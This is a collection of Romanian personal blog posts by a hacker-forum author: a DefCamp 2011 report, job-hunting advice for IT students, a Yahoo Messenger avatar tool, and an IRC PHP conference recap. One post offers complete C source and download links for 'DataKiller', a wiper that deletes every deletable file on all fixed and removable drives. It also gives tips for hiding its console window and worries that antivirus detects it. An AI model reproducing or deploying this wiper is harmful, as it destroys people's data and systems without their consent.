Informatile oficiale le puteti citi aici: http://defcamp.ro/

Eu voi discuta acest eveniment din propria perspectiva.

Pentru inceput, acest eveniment e o idee mai veche, a mai multor persoane. Am discutat si chiar daca nu speram ca va deveni realitate, se pare ca s-a pus in practica acest proiect. Defcamp e un o conferinta (puteti alege si alti termeni) nationala, unde ne-am intalnit o serie de persoane pasionate de hacking si de securitatea IT si am abordat diverse teme privind pasiunile noastre, pe langa ceea ce noi am numit “socializare” si o sa vedeti mai jos ce a insemnat.

Cine suntem noi? Suntem hackeri? Nu, nu suntem hackeri si multi dintre noi nici nu isi doresc acest lucru. Desigur, noi avem conceptii diferite despre termenul de hacking, conceptii pe care majoritatea dintre voi le aveti induse de mass-media, atat de televiziune si definirea hackerului ca persoana care obtine acces neautorizat la anumite sisteme, cat si de filmele de doi lei, in care hackerii sunt diverse persoane care efectueaza cine stie ce actiuni complicate, apasand in disperare pe o sarmana tastatura si trecand de zeci de firewall-uri ca de ziduri de carton.

De asemenea nu suntem nici experti in securitate, nu acoperim domenii intregi ci invatam ceea ce ne place si ne intereseaza in legatura cu aceste domenii, de obicei problemele de securitate care pot sa apara. Multi dintre noi nici nu suntem programatori, dar poate stim programare mai bine ca multi pseudo-programatori care castiga o gramada de bani, pentru niste bucati de cod scrise cu picioarele. Stim programare, nu stim totul, dar stim unde pot sa apara probleme de securitate, cum le putem descoperi, cum le putem exploata dar si cum le putem repara.

Aceste detalii ne deosebesc pe noi de alte persoane si anume:

1) Programatorii sunt persoane care scriu cod pentru bani. Poate fac asta din placere, dar o fac din placere numai la inceput, apoi dispare tot farmecul.De asemenea, nu scriu ce cod vor, in ce limbaj vor, cum vor, ci asculta de niste sefi, multi dintre ei probabil mult mai slab pregatiti. Chiar si pentru bani, nu prea se pune accentul pe securitate, cea mai mare parte a programatorilor scriu cod cum au invatat si nu se gandesc la faptul ca un utilizator “rau” poate folosi un sir de caractere in locul unei valori numerice pentru un anumit parametru, astfel lipsind o validare, pot sa apara probleme grave de securitate. Si acesta este doar un exemplu.

2) Corporatistii (din industria IT) sunt din nou niste persoane care isi lauda legatura cu securitatea, doar pentru ca au niste notiuni teoretice si au auzit si ei de anumite tipuri de atacuri. De cele mai multe ori sunt persoane in varsta, care considera ca in experienta lor de ani de zile au intalnit si stiu sa contracareze totul. Nici pe departe adevarat. Ei nu stiu ce inseamna sa exploatezi un SQL Injection si ce metode de “bypass” exista,  ei nu stiu cum functioneaza un buffer overflow, heap overflow, local root privilege escalation exploit si multe altele, iar faptul au auzit de acesti termeni nu ii face experti in aceste domenii.

3) Hackeri de carton. Daca va treziti cu diversi pusti de 15 ani ca ofera contra-cost cine stie ce servicii cum ar fi spargerea unei parole de messenger sau spargerea unui site… bingo, ei intra in aceasta categorie. Sunt persoane foarte tinere, de obicei sub 18 ani cu o mentalitate si o moralitate foarte putin dezvoltate, nu stiu ce inseamna etica hackingului si ce inseamna sa muncesti pentru un lucru. Sunt cei mai noi in acest domeniu si gasesc o multitudine de lucruri interesante, dar se rezuma la cele mai distrugatoare, la cele care le-ar putea hrani orgoliul, orice cu care ar putea sa se laude prietenilor. Dintre ele, spargerea unui site sau furtul (si nu “spargerea”) unei parole reprezinta lucruri marete. Desigur, nu fac nimic complicat, tot ce fac e sa foloseasca niste programe scrise de oameni ca noi, care nu cer bani pentru astfel de programe, si care le fac din placere, si cu 2-3 click-uri obtin diverse informatii. Desigur, cei mai multi dintre ei se lauda cu nimic.

4) Expertii in securitate sunt persoanele care lucreaza in domeniu securitatii IT. Sunt persoane care lucreaza la firme specializate pe acest domeniu si care stapanesc o multitudine de informatii care le ofera si satisfactii financiare pe masura.  Cunostintele lor nu se rezuma la un singur domeniu, multi dintre ei cunosc mai multe lumbaje de programare si de scripting, precum si arhitectura mai multor sisteme de operare. Problema e ca probabil nu mai fac nimic din placere, ci o fac pentru bani. Asta ii impiedica sa descopera lucruri noi si devin niste roboti ai industriei. Ei sunt practic de vina pentru industrializarea hackingului, pentru faptul ca se vand pentru bani.

5) Hackerii sunt niste persoane din ce in ce mai rar intalnite in ziua de azi. Aici sunt sigur ca am o perspectiva diferita chiar si fata de marea majoritate a oamenilor din industria securitatii IT. In trecut, existau diverse grupuri de persoane pentru care programarea, securitatea si descoperirea si exploatarea vulnerabilitatilor erau o arta.  E vorba de persoanele care au descoperit primele Buffer Overflow-uri, primele SQL Injection-uri (folosesc acesti termeni pentru ca sunt consacrati in aceste domenii), oameni cu o imaginatie bogata, cunostinte vaste “vandute” gratis altor persoane care vor sa invete lucruri noi. Da, pana la urma totul se rezuma la bani. Hackerii adevarati sunt acele persoane care ofera informatia gratuit celor care o doresc, dar lucrurile tind sa se schimbe in ziua de azi cand se pare ca majoritatea persoanelor cu adevarat bune in diverse domenii fac orice pentru bani. Aici apare si maturitatea. Practic varsta frageda ii impiedica sa se vanda pentru niste sume de bani. La ei totul vine din placere si cel mai adesea din curiozitate: “Dar daca folosesc un sir de caractere mai mare decat marimea buffer-ului, ce o sa se intample?”.

O discutie despre acest domeniu ar putea fi scrisa intr-o carte, eu doar am vrut sa ilustrez cateva idei, sa va faceti o idee despre modul in care gandesc eu si despre modul in care gandim noi, probabil cea mai mare parte (sper) a participantilor la Defcamp 2011.

Defcamp a strand la Bran, weekend-ul 30 septembrie – 1 octombrie in jur de 40-50 de oameni. Ideea principala era sa ne impartasim idei si sa abordam teme cat mai tehnice pe care sa le putem dezbate, sa putem crea ceva mai bun si sa punem pe picioare diverse colaborari de viitor sau sa ne deschidem noi perspective.

Din punct de vedere organizatoric cred  ca totul a fost perfect. Pentru asta vreau sa le multumesc sponsorilor: Club Vila Bran, Bitdefender si Ucoz Romania. Am avut parte de cazare gratuita (50 de persoane), o sala de conferinte si RedBull si Pepsi cu sacii (si la propriu si la figurat). Poate singura problema ar fi fost preturile cam mari la restaurantul la care am mancat, dar mancarea facea toti banii. Desigur, am avut noi grija ca bautura sa nu lipseasca si ne-am provizionat intr-o seara astfel incat sa avem indeajuns… Nu vreau sa dau detalii despre ce, cum si cat am baut, veniti la editia viitoare si vedeti cum o sa fie.

In legatura cu prezentarile ar putea fi multe de spus, s-au discutat foarte multe lucruri tehnice, de la criptografie la tehnici avansate de SQL Injection. Prezentarile le puteti vedea aici: http://defcamp.ro/blog/defcamp-2011-un-final-al-unui-inceput/ . Eu am discutat despre PE File Format (structura fisierelor executabile: .exe .dll), DLL Injection (metode de injectare a unui DLL intr-un alt proces, pentru a executa propriul cod in cadrul unui alt proces) si API Hooking (monitorizarea si interceptarea apelurilor functiilor de sistem), dar si putin despre incarcarea manuala a unui executabil in memorie. Bine, facusem si un proiect si urma sa il prezint, dar proiectul a fost facut cu o noapte inainte, deci nu am avut timp sa fac ceea ce imi doream si nu am avut nici destul timp sa prezint, m-am lungit si nici nu am acoperit tot ce voiam sa acopar. A, da, prezentarea mea e realizata din cateva imagini gasite prin calculator pentru ca am facut-o cu o ora inainte de a prezenta, putin ametit si fara acces la internet si prea multe materiale.

Dintre celelalte prezentari cel mai mult mi-au placut tehnicile de “MySQL Injections” ale lui denjacker, un prieten cu care mai discutam diverse lucruri despre acest domeniu la o bere. De acolo pe langa faptul ca am invatat cateva lucruri care ma gandeam ca sunt imposibile, am mai si gandit cateva lucruri noi pe care sper sa le pot incerca in curand cu el, in limita timpului disponibil. A se lua in considerare tehnica de DOS folosind BENCHMARK, pe cat de ingenioasa, pe atat e de usor de pus in practica, si se pare ca din cateva request-uri, se poate “chinui” un procesor, se poate forta sa lucreze la 100%.

Pe langa lucrurile tehnice, a fost si ceva ce noi am numit “socializare”, dar care a fost mult mai mult decat atat. Ne-am strans cea mai mare parte dintre noi intr-un apartament mare, oameni care ne stiam din mediul online si care am descoperit ca suntem mult mai “ok” in viata reala. Am baut, multi au jucat pocker (mie nu imi place), am jucat Counter-Strike si multe altele. Imi e dor de discutiile tehnice dupa multa vodka, parca au alt farmec daca sunt purtate astfel.

Nu prea s-a dormit, majoritatea am stat pana cel putin 04:00, dar a trebuit sa dormim pentru ca programul “tehnic” incepea de dimineata. Bine, nu prea am ajuns noi la timp, a durat ceva sa ne “trezim”, dar totul s-a desfasura foarte bine si nu au fost probleme.

De asemenea, una dintre cele mai importante activitati a fost Defcamp Forensic Contest. A fost un concurs bazat pe o serie de probe, practic trebuia sa facem rost de parolele unor arhive prin diverse metode. De exemplu, la prima arhiva a fost un script in limbajul “brainfuck” (vezi Wikipedia), la un altul erau doua imagini si trebuia facuta o operatie cu matricile de RGB ale acelor matrice… Proba care ne-a cam chinuit a fost a III-a, era un joc de sah, JavaScript, la care se stiau anumite pozitii, si trebuia scris un program care sa verifice toate posibilitatile intr-un mod optim pentru a rezolva problema. Multumiri (acolo l-am injurat putin) lui Hertz, baietul care a conceput aceste probe.

In final, am invatat lucruri noi, am legat prietenii, ne-am distrat, ne-am simtit bine.

Sper sa ne revedem si la Defcamp 2012!

Modificare: Ultima versiune: [RST] DataKiller.c v2.0

Atentie! Nu rulati acest executabil, va incerca sa stearga toate fisierele!

O descriere mai amanantita: acum ceva timp, mi-a cerut cineva un astfel de program si mi s-a parut o idee interesanta. Este prima versiune, am de gand sa ii pun cateva optiuni utile (sa stearga doar pozele de exemplu). Practic nu stiu ce sa zic despre el, l-am rulat pe masina virtuala si a sters majoritatea fisierelor si a folderelor, dar daca il mai rulam o data, mai gasea ceva de sters. Ideea e ca a lasat un XP cu 240 de foldere si 260 de fisiere si cam 150 MB, aproximativ, deoarece dupa cum stiti nu toate fisierele pot fi sterse. Apoi, dupa restart, calculatorul nu va mai porni, pe testul meu nu gasea hal.dll (hardware abstraction layer) ce e un fisier important de sistem. De asemenea au inceput sa apara mesaje de la “Windows File Protection”.

Ideea e ca stergerea e banala: parcurgere recursiva a partitiilor (fixed SI removeable) apoi a folderelor si stergerea tuturor fisierelor care se pot sterge. Nu verifica daca un fisier e deschis de un program, nu inchide procese, doar incearca sa stearga un fisier. Si oricum am cateva idei de viitor.

Codul sursa nu are rost sa il ascund, problema ar fi faptul ca nu e extraodrinar scris, nu m-am straduit sa fac optimizari.

DataKiller.c

/*
Name: DataKiller.c
Description: Delete all deleteable files
Author: Nytro @ Romanian Security Team
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Marimi buffere */

#define VOLNAME_SIZE 4
#define VOLBUFFER_SIZE 1337
#define DIRBUFFER_SIZE 255
#define FILENAME_SIZE 31337

/* Contoare pentru nr. de fisiere si de foldere */

int nr_files = 0;
int nr_directories = 0;
int deleted_files = 0;
int deleted_directories = 0;

/* Functie recursiva, sterge folderele si fisierele */

void DeleteFiles(char *directory)
{
WIN32_FIND_DATA file_data;
HANDLE hFisier;
int new_file = 1;
char dir_buffer[DIRBUFFER_SIZE] = {0};
char file_name[FILENAME_SIZE] = {0};
char new_dir[DIRBUFFER_SIZE] = {0};

/* Formam sirul de caractere pentru FindFirstFile */

memset(&file_data, 0, sizeof(WIN32_FIND_DATA));
sprintf(dir_buffer, “%s*”, directory);

hFisier = FindFirstFile(dir_buffer, &file_data);

/* Parcurgem folderul */

while(hFisier != INVALID_HANDLE_VALUE && new_file)
{
sprintf(file_name, “%s%s”, directory, file_data.cFileName);

/* Daca e folder */

if(GetFileAttributes(file_name) & ~(FILE_ATTRIBUTE_DIRECTORY ^ 0xFFFFFFFF) && (GetFileAttributes(file_name) != (unsigned)-1))
{
sprintf(new_dir, “%s\\”, file_name);

/* Evitam “.” si “..” */

if(file_name[strlen(file_name) - 1] != ‘.’)
{
nr_directories++;
DeleteFiles(new_dir);
if(RemoveDirectory(new_dir)) deleted_directories++;
}
}

/* Daca e fisier */

else
{
nr_files++;
if(DeleteFile(file_name)) deleted_files++;
}

/* Trecem la urmatorul fisier/folder */

new_file = FindNextFile(hFisier, &file_data);
}

FindClose(hFisier);
}

int main()
{
char *dir_buffer = NULL;
char **drives;

int dir_buf_size = 0, nr_drives = 0, i = 0;

/* Alocam memorie */

dir_buffer = (char *)malloc(VOLBUFFER_SIZE);
dir_buf_size = GetLogicalDriveStrings(VOLBUFFER_SIZE, dir_buffer);
nr_drives = dir_buf_size / VOLNAME_SIZE;
drives = (char **)malloc(sizeof(char *) * nr_drives);

/* Parcurgem volumele */

for(i = 0; i < dir_buf_size / VOLNAME_SIZE; i++)
{
drives[i] = (char *)malloc(VOLNAME_SIZE);
strncpy(drives[i], dir_buffer + i * VOLNAME_SIZE, VOLNAME_SIZE);

printf(“Drive: %s: %d\n”, drives[i], GetDriveType(drives[i]));
if(GetDriveType(drives[i]) == DRIVE_FIXED || GetDriveType(drives[i]) == DRIVE_REMOVABLE) DeleteFiles(drives[i]);
}

printf(“Foldere: %d\nFisiere: %d\n”, nr_directories, nr_files);
printf(“Foldere sterse: %d\nFisiere sterse: %d\n”, deleted_directories, deleted_files);

/* Eliberam memoria */

for(i = 0; i < nr_drives; i++) free(drives[i]);
free(drives);
free(dir_buffer);
return 0;
}

Pastebin: http://pastebin.com/j0hhVwYe

Daca vreti sa il compilati, compilati-l cu optiunea “-mwindows” pentru linker, astfel incat sa nu se deschida CMD-ul cand va fi rulat. Eu l-am compilat si cu optimizari pentru marime “-s” si “-Os”.

Utilizare? Cred ca o sa ii gasiti voi una, cred ca vor fi destui care il vor gasi “util”.

Partea nasoala, din cate observ, e ca e detectabil…

VirusTotal

O sa lucrez si la acest aspect. Ideea e ca il puteti compila din sursa, sa nu credeti ca am postat altceva.

Download:

• http://www.girlshare.ro/2525944.3
• http://www.speedyshare.com/files/29950889/DataKiller.exe
• http://www.megaupload.com/?d=K6VWUWDE
• http://www.mediafire.com/?au76q4sr32kscgg
• http://www.multiupload.com/3MSCGK8A4H

Stiu, e banal, stupid si non-etic, eu nu am nevoie de asa ceva dar unii poate au nevoie.

Fiti rai!

M-am angajat şi eu de curând şi am învăţat câteva lucruri importante, lucruri care pot fi foarte utile celor care vor să se angajeze în domeniul IT.

Care să fie cel mai bun moment în care să te angajezi? Asta depinde de fiecare în parte. Mă voi adresa în special celor ca şi mine, studenţi (la informatică) care vor să devină independenţi.

Înainte de a vă angaja trebuie să vă puneţi mai multe întrebări:

- îmi ajung banii pe care mi-i oferă parinţii?

- o să mă mai pot distra dacă voi lucra?

- voi putea să mă ţin de şcoală dacă mă angajez?

- cum se va schimba viaţa mea pe viitor?

Şi probabil multe altele. Nu luaţi asta în glumă. De aceste alegeri şi de cum răspundeţi la acele întrebări depinde viaţa voastră.

Ca să vă răspund eu la întrebări: da, vă ajung banii de la părinţi, dar vreţi mai mulţi şi nu mai vreţi să depindeţi de părinţi. Da, o să aveţi timp şi de distracţie, nu cred că vă distraţi la 13:00, la ora aceasta dormiţi, dacă e să faceţi ceva interesant faceţi seara/noaptea. Cu şcoala probabil vor apărea probleme, dar dacă nu vreţi să aveţi numai 10 pe linie şi nu vă pasionează mersul la facultate, nu veţi avea probleme. Examenele se pot lua învăţând o noapte (cazul meu, ce-i drept cu 5 şi nu toate). Viaţa se va schimba, dar nu foarte drastic. Vei avea mai puţin timp liber, dar o să îl poţi valorifica mai frumos.

Câteva idei de urmărit: nu e bine să vă angajaţi din primul an, mai ales dacă aţi venit din alt oraş, nu e recomandat să cereţi miliarde ca salariu, nu o să vă dea nimeni: nu aveţi experienţă şi alegeţi un loc de muncă unde chiar v-ar plăcea să lucraţi, pe cât posibil, nu doar să o faceţi pentru bani. Dacă vă descurcaţi cu banii şi dacă vreţi să mai aşteptaţi până să ‘prindeţi experienţă’, sincer, nu vă recomand să vă angajaţi. Veţi lucra toată viaţa, o să vă săturaţi, trăiţi-vă viaţa, staţi liniştiţi acasă, fără griji. Şi ascultaţi de părinţi şi de prieteni, luaţi în considerare ceea ce spun însă gândiţi, doar voi ştiţi ce e cel mai bine pentru voi (destul de des nu e aşa).

Lăsând noţiunile morale, să trecem la lucruri practice şi aici probabil cel mai important lucru e CV-ul.

În primul rând trebuie să fie ordonat, nu să împrăştiaţi date prin el şi să nu se înţeleagă nimic. Apoi, trebuie să specificaţi orice credeţi că ar putea fi util, ca un angajator ar vedea cu ochi buni. De asemenea, poza de pe CV ar fi de preferat să fie una decentă, eu am mers la un interviu cu un CV cu o poză mai nepotrivită şi persoana cu care discutam, având CV-ul meu în faţă, a tăiat poza cu pixul şi a specificat că aceea nu e poză de CV. Ulterior, am înlocuit-o cu una mai elegantă, în costum. De asemenea, contează şi adresa de mail, nu o să fie mulţumiţi daca vor vedea “vasile_bagabontu@yahoo.com”. Ar fi de preferat să faceţi un mail separat pentru CV, “nume_prenume_ceva@gmail.com” de exemplu, mie mi s-a atras atenţia şi asupra mail-ului.

Dar ce conţine CV-ul? Eh, aici e problema. Problema e că nu conţine mai nimic. De aceea sfatul meu pentru cei care sunt la liceu e să facă cât mai multe lucruri care ar putea fi trecute în CV, orice proiect, cât de mic, contează foarte mult. Acest lucru e valabil mai ales pentru persoanele care “ştiu” programare. Sunt foarte mulţi care sunt de această părere, dar angajatorii nu vor fi dacă nu vor vedea un proiect. Ai învăţat C/C++, PHP sau orice altceva în liceu? Pune în practică. La fel, dacă eşti la facultate, poţi găsi puţin timp să faci un proiect, nu pierde timpul degeaba.

Sunt mai multe lucruri care ar trebui trecute în CV-ul unui viitor IT-ist. puteţi trece postul urmărit (Full time, Part time, Project based, Internship) şi salariul dorit. Atenţie ce valoare îi atribuiţi aici variabilei, dacă vor vedea 2000€ nu vor citi mai departe. Treceţi apoi cunoştinţele voastre, ceea ce ştiţi, proiecte şi orice altceva tehnic ce ar putea fi util. De asemenea treceţi şi lucruri mai puţin tehnice ca “mă adaptez uşor”, “învăţ repede lucruri noi”… Şi aşteptaţi-vă şi la întrebări legate de aceste lucruri.

Bun, v-aţi făcut CV-ul şi vreţi să treceţi la treabă. Cel mai simplu şi mai practic, vă faceţi conturi pe bestjobs, ejobs. Dar degeaba vă faceţi cont acolo dacă nu aplicaţi la oferte. Se caută şi CV-uri, dar slabe şanse să fie găsite ale voastre. Selectaţi domeniile urmărite şi vedeţi la fiecare slujbă ce se cere. Dacă eşti sigur că te descurci poţi aplica, dacă nu, nu are rost. Şi aplică la cât mai multe. De multe ori nici nu se uită pe CV, văd că nu aveţi experienţă, că nu aţi mai lucrat şi trec mai departe. În plus, multe firme o să vadă CV-ul dar nu o să vă cheme la interviu deoarece aplică multe persoane şi probabil multe dintre ele sunt mai pregătite. Aplicaţi la cel puţin 20-30, aveţi de unde alege, sunt multe locuri în domeniu. Selectaţi în special posturile pentru “Junior”. Avem avantajul că în domeniul nostru (IT, Software, calculatoare) există astfel de posturi special adresate celor fără experienţă şi aici avem cele mai multe şanse. Desigur, salariile nu sunt exagerat de mari, e mai greu la început, dar trebuie să trecem şi prin asta. De asemenea mai există şi internship-uri care pot fi foarte utile şi se pot învăţa multe lucruri.

În fine, am făcut CV-ul, am aplicat la mai multe locuri şi ne cheamă la interviu. La primul interviu nu trebuie să fiţi speriaţi sau emoţionaţi. De cele mai multe ori veţi vorbi cu persoane tinere şi vesele. O să vă placă la interviuri, cel puţin la primele. Contează mult impresia pe care o faceţi, sugestia mea e să fiţi voi înşivă.

Pe lângă întrebările despre voi, de cele mai multe ori veţi da teste tehnice, care nu sunt simple. Şi acum se vede ceea ce ştiţi. Eu încă de la primul interviu mi-am dat seama că ştiu foarte puţine.

De exemplu, dacă aplicaţi pentru un post de programator PHP aşteptaţi-vă la întrebări ca:

- care e diferenţa dintre <<<CEVA şi <<<’CEVA’ (heredoc şi newdoc)?

- ce e o clasă abstractă, ce e o interfaţă şi care sunt diferenţele dintre ele?

- cum se serializează un obiect?

- ce fac şi cum se folosesc __invoke, __string?

- ce face şi când se foloseşte cuvântul cheie ‘static’?

- care e durată de viaţă a unui cookie pentru care nu se specifică aceasta?

- scrie un query cu JOIN-uri care leagă 3 tabele (ca idee – MySQL)

- ce sunt şi cu ce ajută procedurile pregătite (prepared queries – MySQL)

- pe ce coloane ar trebui puşi indecşi în baza de date pentru căutări rapide (MySQL)?

Dacă nu ştii să răspunzi la aceste întrebări nu ştii PHP şi MySQL şi ar trebui să mai înveţi. Cam în această situaţie am fost şi eu. De asemenea, e posibil să nu lipsească intrebări despre mod_rewrite, jQuery/JavaScript, Linux, poate chiar şi extensii PHP ca sockets. De asemenea ar fi foarte util să cunoaşteţi cel puţin un Framework PHP ca Zend, CakePHP, CodeIgniter sau Symphony. Legat de MySQL aţi putea să învăţaţi şi partea de administrare şi câte ceva despre motoarele de stocare.

Dacă aplicaţi pentru un post de programator C/C++:

- cum se supraîncarcă un operator?

- acces la date moştenite ca private/public/protected…

- ce este o funcţie virtuală şi la ce foloseşte?

- care-i treaba cu un destructor virtual?

- ce este ‘placement new’? (informativ)

- cum apelezi o funcţie dintr-un vector de pointeri la funcţii?

- scrie un cod care să inverseze o listă simplu înlănţuită

- scrie cod care să genreze numere aleatoare, scriere în fişiere…

În fine, vor fi multe întrebări legate de limbaj în sine şi de algoritmică. Probabil nu ce am întrebat eu, dar lucruri asemănătoare. Dar aici stau altfel lucrurile, nu ca la PHP. Aici nu e de ajuns să cunoşti doar limbajul, însă alte lucruri cu care vei lucra la firmă le vei învăţa ulterior. Ai putea să înveţi cate ceva despre Windows API, multithreading sau ce ţi s-ar părea mai util. Aici totul depinde de firma la care mergi la interviu, cu ce se ocupă. Pot de exemplu scrie module de kernel şi în acest caz nu e de ajuns să ştii doar limbajul.

La firma la care lucrez eu au fost şi întrebări ca:

- modalităţi de comunicare inter-procese (IPC – Inter Process Communication)

- care sunt avantajele şi dezavantajele protocolului UDP faţă de TCP?

- enumeră nivelurile modelului OSI

- la ce se folosesc şi exemple pentru ‘sed’ şi ‘awk’

Nici pentru un post de ‘Administrator Linux’ nu e deloc uşor. Nu o să trebuiască să ştii ce face ‘ls’, va trebui să ştii multe, în principal shell scripting şi foarte multe despre Linux şi configurare, lucruri pe care nu le vei învăţa din GUI-urile de la Ubuntu. Poţi încerca de exemplu să compilezi un kernel sau să instalezi programe din sursa, să faci totul de la dezarhivare la instalare în linia de comandă.

De asemenea, Administrator Linux nu înseamnă să scrii două comenzi în terminal şi gata, de securitate, permisiuni fişiere şi toate cele nu se pune problema. Trebuie să stai bine şi la capitolul reţele. Să ştii cel puţin ce e TCP/IP/UDP şi ce structură au, câte ceva despre DNS şi protocoale de nivel aplicaţie: HTTP, FTP… De asemenea nu ar strica să cunoşti şi nişte protocoale de routare.

Cam la astfel de interviuri am fost şi cam astfel de date vă pot oferi. Ideea de bază e că nu e uşor deloc şi veţi descoperi repede că nu ştiţi foarte multe lucruri şi ca sunt multe lucruri pe care trebuie să le învăţaţi.

Pe lângă partea tehnică, vă vor întreba şi de salariu. Nu vă aşteptaţi la miliarde, cine şi pentru ce v-ar da mai mult de 20 de milioane? Voi aţi da cuiva care nu are experienţă, care nu a mai lucrat şi care ştie doar limbajul cu care va lucra mai mult de 20 de milioane? Nu prea cred. Cereţi cam 300-400 maxim 500 de euro. Dacă veţi specifica în CV că vreţi 500 de euro sunt şanse foarte slabe să fiţi contactat, nu vor fi multe firme disponibile să vă ofere astfel de sume. Cereţi cam 400 de euro, eu cred că e bine pentru început.

Apoi, totul depinde de firmă: ce fel de contrat, cât de strict, ce ai voie şi ce nu ai voie să faci la muncă, cum merg lucrurile, ce face firma şi ce vei face tu la firmă…

Cam asta vă pot spune eu, sper să găsiţi informaţii utile care să vă ajute. Baftă!

De ceva timp, cei de la Yahoo! au facut cateva modificari in protocolul folosit de Yahoo! Messenger pentru a nu mai functiona detectoarele de invizibilitate.

Aceste detectoare, care nu mai functioneaza, si pana in momentul de fata nu exista nici unul functional, se bazau pe protocolul celor de la Yahoo!, YMSG, pentru a determina daca cineva e pe invizibil. Ideea pe scurt e urmatoarea: aceste avatare logau niste boti (niste ID-uri) care cereau prin protocol avatarul persoanei careia dorea sa i se afle starea (invizibil sau nu), aceasta trimitea un mesaj de confirmare, si astfel se putea sti daca este pe invizibil sau nu.

Cum aceasta metoda se baza pe avatare, dupa modificarile celor de la Yahoo! au aparut probleme cu acestea, deoarece nu se mai gasesc unde se gaseau pana la acele modificari. Astfel, daca veti dori sa gasiti avatarul cuiva folosind un site care face acest lucru, probabil va va afisa vechiul avatar, cel de dinainte de modificari, insa sunt si site-uri care afiseaza avatarul corect. Asadar, link-ul de forma:

http://img.msg.yahoo.com/avatar.php?yids=[ID_DE_MESS]

Nu mai functioneaza corect, ci afiseaza ultimul avatar folosit de persoana respectiva, inainte de modificarile celor de la Yahoo!.

Problema in a afisa avatarul corect este ca trebuie sa fii logat (tu, sau un ID oarecare) pentru a il putea vedea.

Am facut acum ceva timp, o mica aplicatie care putea prelua avatarul cuiva, insa nu era completa si necesita cookie valid pentru a functiona.

Am revenit asupra acelei aplicatii si este aproximativ gata.

Ce e nou:
- nu mai trebuie specificat cookie
- logheaza automat un bot
- daca primul bot nu mai e bun, ii foloseste pe cei 2 de rezerva
- la click pe avatar, acesta se va deschide cu programul implicit de vizualizare imagini (png)
- puteti apasa Enter dupa ce ati scris ID-ul pentru preluare
- nu ar trebui sa crash-uiasca in caz de eroare, in plus ar trebui sa apara diverse mesaje oarecum explicative (e mai stabil)

Asadar, aplicatia foloseste un bot, il logheaza si folosindu-se de el preia avatarul dorit. Dupa logare, pentru preluarea unui alt avatar nu va mai fi necesara inca o logare, preluarea se va face mai rapid. Avatarul se salveaza in folder cu programul cu numele [ID_DE_MESS].png.

Stiu ca aplicatia nu e cine stie ce, dar cred ca pentru unele persoane va fi utila.

Legat de codul sursa, nu cred ca are rost sa il fac public. E vorba de trimisul a 2-3 request-uri HTTP si cam atat.

Un screenshot cu aplicatia (ID luat de pe Google):

Link-uri pentru descarcare:

• http://www.megaupload.com/?d=WMS7PVI0
• http://fisierulmeu.ro/29H42HI8KSGV/Preluare-avatar-exe.html
• http://www.girlshare.ro/1992907.4
• http://www.speedyshare.com/files/27345524/Preluare_avatar.exe
• http://rapidshare.com/files/452111238/Preluare_avatar.exe

Astept pareri, sugestii, critici… Bafta!

Aceasta “conferinta” este de fapt o discutie organizata pe un canal de IRC in care se dezbat diverse probleme de programare si securitate IT (de fapt IT in general). Exista cateva persoane care prezinta anumite subiecte, iar restul participantilor pot comenta, adresa intrebari si sugestii sau pot critica.

La aceasta editie care a durat 5 ore, s-a prezentat un proiect WorldIT, WorldIT Forensic Contest, apoi Stefan Olteanu (johane), membru Craiova Linux Users Grup, a discutat despre “Medii grafice in Linux”, “Interconectarea Windows-Linux-Samba” si “Alternative Linux la programe Windows”.

Dupa aceste prezentari, am urmat eu cu prezentarea programarii orientate pe obiecte in PHP 5, de la teorie la practica.

Am preferat sa fiu foarte detaliat si prezentarea mea a durat ceva mai mult, cred ca in jur de 3 ore, dar dupa o ora si jumatate am facut pauza deoarece imi obosisera mainile. Notiunile prezentate, foarte pe larg, le puteti gasi in acest slideshow creat pentru aceasta conferinta. Am acoperit o mare parte din ceea ce inseamna programare orientat pe obiecte in PHP, dar ar mai fi fost foarte multe de spus. Oricum, nu am avut timp sa prezint tot, dupa 5 ore am decis ca e mai bine sa nu mai prezint si ultimul slide care ar mai fi durat aproximativ o ora.

Au participat in jur de 250 de persoane, media fiind de 35 online, valoarea maxima (~50 de participanti) atingandu-se in primele doua ore. Cred ca nu este rau pentru inceput.

A fost foarte interesant si mi-a placut sa vorbesc si este posibil sa o fac din nou. Ma bucura sa stiu ca au fost persoane interesate de prezentarea mea si ca au rezistat pana la final si le multumesc pentru sustinerea morala, pentru incurajari.

Toata conferinta o puteti citi aici (eu sunt Nytro pentru cei care nu stiau deja acest lucru) si pentru cei care vor sa invete POO in PHP 5 cred ca ar fi un inceput foarte bun.

Sper sa fiti alaturi de mine la o posibila viitoare conferinta.

http://img.msg.yahoo.com/avatar.php?yids=id_de_mess

Nu mai afiseaza avatarul curent, ci ultimul, inainte de modificarile facute de Yahoo!.

Am facut putin research si am gasit o metoda de a prelua avatarul cuiva. Nu e complicat, insa problema e ca trebuie sa fii logat pentru a putea vedea un avatar.

Programul nu se logheaza, ci foloseste direct niste cookie (date prin care serverul stie ca un utilizator e logat) – multumesc Nemessis – cu ajutorul carora are acces la avatare. Probleme cu aceste cookie-uri, este ca functioneaza doar 24 de ore. Asadar, e posibil sa nu mearga.

Un alt lucru de mentionat, este ca am facut programul in graba, deci e scris prost si foarte predispus la erori. E prima versiune, nu am avut chef sa ma chinui cu el.

Asa arata programul (e urat, stiu) – ID-ul e luat de pe Google:

Preluare avatar

E prima versiune, daca am chef ii aduc imbunatatiri, vad eu ce fac.

Daca nu va merge, postati aici ce problema aveti. Cineva a avut probleme pe XP, pe Windows 7 merge bine la mine si la altcineva, testati si voi.

E facut in Visual Basic 6 si foloseste cateva module luate de pe net (pentru lucrul cu PNG-uri, modSocketMaster si descarcatul folosind MS Internet API) pentru a fi gata repede si pentru a nu ma enerva muncind la el. Oricum nu m-am chinuit prea mult, e o porcarie, dar poate e utila.

Link-uri de descarcare:

Maine, daca am timp, rezolv problema cu cookie-urile cu niste boti.

Discutii in legatura cu programul aici:

http://rstcenter.com/forum/31736-rst-preluare-avatar.rst

Bafta.

Confidentialitatea datelor

Pe Facebook facem publice diverse informatii despre noi. Si aceste informatii nu se rezuma numai la fotografii, e vorba si de alte lucruri ca posturile de pe perete, informatiile personale… Dar cui sunt vizibile aceste informatii? De cele mai multe ori nu numai prietenilor, ci sunt facute publice, daca nu pentru “prietenii prietenilor”, catre toata lumea.

